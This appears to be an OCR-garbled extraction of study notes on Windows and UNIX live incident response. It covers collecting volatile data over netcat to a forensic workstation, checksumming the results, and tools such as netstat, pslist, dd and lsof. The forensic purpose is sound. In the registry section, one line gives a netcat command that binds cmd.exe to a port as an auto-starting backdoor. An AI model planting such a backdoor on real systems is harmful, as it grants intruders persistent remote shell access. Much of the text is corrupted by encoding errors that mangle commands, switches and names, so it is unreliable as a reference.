windows live response

8/10/2019 Windows Live Response

1/14

Windows Live ResponseChapter 1

Live Incident Response Process

Start a netcat server on forensic workstation with the followingcommand:nc v l p 2222>command.txt

On the victim computer you will want to run a command to collect liveresponse data.The data can be sent from the victim computer with the followingcommand:

command| nc forensic_workstation_ip_address 2222

ip address of forensic worstation

A simple MD checksum of command.t!t can be calculated so that youmay prove its authenticity at a later date:

md!s"m # command.txt > command.md!

"ou will always want to use the #b command$line switch. md!s"misavailable in the %ygwin utilities from www.c$%win.com.

A variant of netcat is named cryptcat&http:''sourceforege.net'pro(ects'cryptcat ) should be used because itencrypts all fo the data across the T%* channel. +ecause the data isencrypted, intruders will not be able to see what you are collecting.

&nal$'in% (olatile )ata1* +$stem )ate and ,ime

The time and dare are simply collected by issuing the timeand datecommands at the prompt.

2* C"rrent -etwor Connections-e view a machines network connections by issuing the netstatcommand. -e specify the #an /ags with netstat to retrieve all of thenetwork connections and the raw 0* addresses instead of the 1ully2uali3ed Domain 4ames &12D4)

netstat an

1
http://www.cygwin.com/http://sourceforege.net/projects/cryptcathttp://sourceforege.net/projects/cryptcathttp://www.cygwin.com/


2/14

Port ! /le sharin% port 0-,I3+ r"ns on this port*Port 21 4,P portPort 56!5 -att$+erver 0(IL*


5se www.portsdb.orgto 3nd out what services run on ports.

*orts above 6789 typically are ephemeral ports.

5* 3pen ,CP or 7)P Ports and *xec"ta#les 3penin% ,CP or7)P Ports5se 4Portto e!amine strange ports that are open on the machine tolink to the e!ecutables that opened them. This can be found atwww.foundstone.com.

ename your netcatbinary to t8-C.9to symboli;e that it istrusted.

!* Cached -,I3+ -ame ,a#les-indows &up until version 877


3/14

To learn the processes the attacker e!ecuted use the pslisttool fromthe Ps,oolssuite distributed from www.s$sinternals.com.

Windows Live Response

Chapter 1

The 3rst several lines can be system processes based on the lengthyelapsed running time. This is indicative of processes running sincestartup, which are typical system processes.

Psxecis a tool distributed from www.sysinternals.comthat enables avalid user to connect from one Microsoft -indows machine to anotherand e!ecute a command over a -etI3+ connection. Attackers usethis tool to typically run cmd.exe. 1irst, *s>!ec will only open achannel if you supply proper administrator$level credentials. Therefore

the attacker has an administrator$level password. Second, the attackerknows one of the passwords and password may work on othermachines in the enterprise. Third, the attacker must be running aMicrosoft -indows system on his attacking machine to e!ecute *s>!ec.

One of the 3rst things attackers usually do when they gain acces to asystem is to transfer their tools to a victim machine.

!ec and *s1ile will reveal the 4et+0OS name of the computer that isattacking. Once you sei;e the attackers computer, you may want tosearch for the 4et+0OS name as a keyword on the attackers computer.

12* Process ?emor$ )"mps

3
http://www.sysinternals.com/http://www.sysinternals.com/http://www.sysinternals.com/http://www.sysinternals.com/


4/14

-e need to capture the memory space of the suspect processes.Details on structure, organi;ation, and management of memory onthese operating systems, we recommend the e!cellent reference,Inside Windows 2000, Third Edition by David Solomon andark !"ssinovich#


Microsoft provides a utility called "serd"mp.exefor the -indows 4Tfamily of operating systems. This tool is a component of the MicrosoftO>M Support tools package available at:

http:''download.microsoft.com'download'win8777srv'5tility'4$5S'Oem net "se B@ AA1=5.


5/14

Sample output:CommandLine@ Dnc d L n p :=


6/14

)@A>dd.exe [email protected]$sicalmemor$ofF'@ARWWW8f"ll8memor$8d"mp.dd #sF=dd.ece ifFAA.Aph$sicaldrive=ofF'@ARWWW8ph$sicaldrive=.dd #sF=


7/14

-e can capture the complete registry in a rather cryptic format byusing egDmp without command$line options. -e can see the keyAMNO8L3C&L8?&CMI-A+oftwareA?icrosoftAWindowsAC"rrent(ersionwith three sub keys: un, unOnce and unOnce>!. Any valuesin R"nsignify programs that will be e!ecuted when the system starts

up.

0f you want to attack, you can place the following command in theregistry to automatically open a backdoor:

nc d L p 1==== e C@AwinntAs$stem52Acmd.exe

5* ,he &"ditin% Polic$


-in 4T and -in 8777 do not have auditing turned on by default,therefore, there are no security$related logs. The command todetermine the auditing policy is a"ditpol. Auditpol is distributed withMicrosofts resource kits.

* & Mistor$ of Lo%ins

A history of logins can be obtained with the -,Lastcommand,distributed by www.foundstone.com. -,Lastis run without command$

line arguments to get all of the login info. 0t is very important toenable auditing.

!* +$stem vent Lo%s

There are typically three types of event logs on a -indows machine.$ Security$ Application$ System

The command *sBogBist within the *sTools suite distributed atwww.sysinternals.comwill e!tract these logs into an easy to readformat.

un:pslo%list s x sec"rit$

7
http://www.foundstone.com/http://www.sysinternals.com/http://www.foundstone.com/http://www.sysinternals.com/


8/14

The #s switch tells psloglist to dump each event on a single line. The #! switch tells psloglist to dump the e!tended information for eachevent.

:* 7ser &cco"nts

5se pwd"mpwhich dumps the user accounts.

6* II+ Lo%s

"ou cannot block what you must allow in.

The 00S -eb server writes any activity to logs in theC@AwinntAs$stem52Alo%/lesdirectory by default. To see what is inthe logs, t$pethem out.

1irst, e!ecute this on the forensic workstation:

nc v l p 2222 > ex=5=


9/14

-hen attacks are successful against a vulnerable server, it causes the-eb server to crash so activity is not logged in the 00S log. The -ebserver should never access the cmd.e!e command shell.

;* +"spicio"s 4iles

To transfer any suspicious 3le , run the following on the forensicworkstation:

-c v l p 2222 > $lename

Then, transfer the 3le named $lenameby using t$pe:

t$pe $lename| nc forensic8worstation8ip8address 2222

P"ttin% It &ll ,o%ether

[email protected]%readin%8roomwhitepapersthreats"nicodeGv"lnera#ilit$Gwh$8!;

7-I9 Live ResponseChapter 2

On forensic workstation, run:

nc v l p 1==== > command.txt

On the victim computer, run:

command| nc forensic_workstation_ip_address 1====

emember to press %TB$% to break the netcatsession.

un:?d!s"m # command.txt > command.md!

1* +$stem )ate and ,ime

un:)ate

2* C"rrent -etwor Connections

un:netstat an

9
http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458http://www.sans.org/reading_room/whitepapers/threats/unicode-vulnerability-why_458


10/14

*ort 6 is the port on which the printer daemon typically listens.Doing a @uick search for Kedhat L.7 and the printer daemon &lpd) onwww.securityfocus.comyou see that this is a vulnerable T%* port.

5* 3pen ,CP or 7)P Ports

un the following to see the process number that opened the port.This only works on Binu! and will not work on other /avors of 540C:netstat anp

The 540C version of 1*ort is lsoffor KBist Open 1iles. lsofis the singlemost powerful tool in the Bive esponse toolkit for 5ni! systems.

un:lsof n


A good source on loaded kernel modules is the book: Malware: 1ightingMalicious %ode by >d Soudis.

* R"nnin% Processes

un to see list of all the running processes on the system and the users

running them:ps a"x

!* 3pen 4iles

un:Lsof

:* ,he Internal Ro"tin% ,a#le

netstat rn

6* Loaded Nernel ?od"les

un:lsmod

;* ?o"nted 4ile +$stems

10
http://www.securityfocus.com/http://www.securityfocus.com/


11/14

un:mo"nt or df

&nal$'in% -onvolatile )ata

1* +$stem (ersion and Patch Level

un to get all the available operating system version information:"name a

un to get package and version number:rpm a


2* 4ile +$stem ,ime and )ate +tamps

un:/nd c@A Gprintf HmJ&xJ&,J,xJ,,JCxJC,J7JKJsJpAn

5* 4ile +$stem ?)! Checs"m (al"es

Databases of known hashes of known system 3les are available atwww.hashkeeper.org

To calculate the MD checksum for every 3le on the system, run:4ind Gt$pe f xdev exec md!s"m # Q AJ

* 7sers C"rrentl$ Lo%%ed 3n

5sers who are currently logged on are saved in the varr"n"tmp.lo%

R"n@w

Attackers who want to seriously hamper your investigation can use'ap2, publically available from www.packetstormsecurity.com

!* & Mistor$ of Lo%ins

11
http://www.hashkeeper.org/http://www.packetstormsecurity.com/http://www.hashkeeper.org/http://www.packetstormsecurity.com/


12/14

A history of logins is saved in 'var'log'wtmp binary logs.

un:last

)atapipeis a utility that will listen on one port and forward the traNcto another port on another machine.

:* +$slo% Lo%s

The syslog daemon listens for messages from either local programs orother servers on the 0nternet and logs them according to theetcs$slo%.confcon3guration 3le

The two logs relevant to an investigation are varlo%messa%esand

varlo%sec"re. The 3fth 3eld is the message that was logged.-hen buer over/ows occur, they break valid programs. -henprograms break, garbage is typically generated in the log.


6* 7ser &cco"nts

>!amine etcpasswdto see whether the intruder has added anyrogue user accounts

A rogue account can have a root directory of ' and more importantly auser 0D of ;ero.

;* 7ser Mistor$ 4iles

Eo to username.bashFhistory t osee 3les that may contain commandsthat failed. 1or e!ample, ps a"xw | %rep datapipe, shows theintruder looking for the keyword datapipe.

$lename

Transfer the 3le named flenameto the forensic workstation:cat $lename| nc forensic_workstation_ip_address 1====

12


13/14

+y entering the procdirectory you can see references to runningprocesses and other system information. "ou see directories namedafter integers, such as 6


14/14

14

windows live response

Documents